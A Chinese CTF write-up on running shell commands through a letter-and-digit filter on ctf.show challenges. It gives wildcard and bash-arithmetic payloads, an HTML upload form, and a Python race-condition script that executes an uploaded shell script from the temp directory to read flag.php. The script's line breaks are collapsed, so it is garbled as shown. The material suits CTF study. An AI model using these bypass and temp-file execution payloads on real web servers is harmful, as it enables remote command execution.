无字母数字命令执行

写在前面

说白了数字还是好构造的，bash的算数拓展！

base64命令

这玩意说白了有点鸡肋，因为你得知道flag的文件名和位置！
base64 flag.php这个会将flag.php里面的内容给base64编码输出来。那么如何用无字母数字构造呢？

/???/?[_-{]??64 ???.??? 中间不用?是因为会匹配到两个命令
ls /???/???64 可以发现满足的会有两个

数字的构造bash拓展

$(())里面可以进行整数运算！

echo $((1+1)) #2
echo $(()) #0
0取反为-1
所以我们可以得到-1，通过$((~$(())))

如何构造64，我们可以先取反64，为-65，构造出-65然后在取反即为64！

额。。。。。前面直接加负号应该也可以。
$((~$(())))*65然后在放进$((~$(())))这里即可！tmd,这md编辑器不太好用。payload就不放了！

到web29去试试（但是有些环境不知道为啥用不了）

上传shell脚本执行临时文件

get请求
get请求不需要竞争

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>POST数据包POC</title>
</head>
<body>
<form action="http://05b99b6f-5912-4c98-90d5-2975d8726117.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接--><label for="file">文件名：</label><input type="file" name="file" id="file"><br><input type="submit" name="submit" value="提交">
</form>
</body>
</html>

先上传一个表单的同时抓包，然后在读临时文件。读取文件就用?c=.%20/???/???[@-[],[@-[]也是linux的通配符表示的方法，@在A前面，[在Z后面。在最后写成大写字母主要是为了怕文件名冲突。shell脚本：#!/bin/sh(或者用其他解释器,bash,zsh) 命令

post请求
这个就需要竞争了，这里用脚本实现即可（ctfshow新系列的无字母数字命令执行就用到这个）

import requests
import concurrent.futuresurl = "http://e7139a42-6102-4aa6-825e-80292bfb395b.challenge.ctf.show/"file_content = b"#!/bin/sh\ntac flag.php"data = {'code': '. /???/????????[@-[]',
}def upload_file():files = {'file': ('test.txt', file_content, 'text/plain')}try:response = requests.post(url, files=files, timeout=5)print(f"上传请求返回状态码: {response.status_code}")return responseexcept requests.exceptions.RequestException as e:print(f"上传请求失败: {e}")return Nonedef send_post():try:response = requests.post(url, data=data, timeout=5)print(f"POST 请求返回状态码: {response.status_code}")return responseexcept requests.exceptions.RequestException as e:print(f"POST 请求失败: {e}")return Nonedef race_condition():with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:futures = [executor.submit(upload_file) for _ in range(25)]futures.extend([executor.submit(send_post) for _ in range(25)])for future in concurrent.futures.as_completed(futures):result = future.result()if result and "flag" in result.text:print("\n--- 成功！可能找到 Flag ---")print(result.text)return Truereturn Falseprint("正在尝试利用条件竞争，请稍候...")
success = False
for i in range(50):if race_condition():success = Truebreakprint(f"第 {i + 1} 轮尝试失败，继续...")if not success:print("\n--- 所有尝试均失败 ---")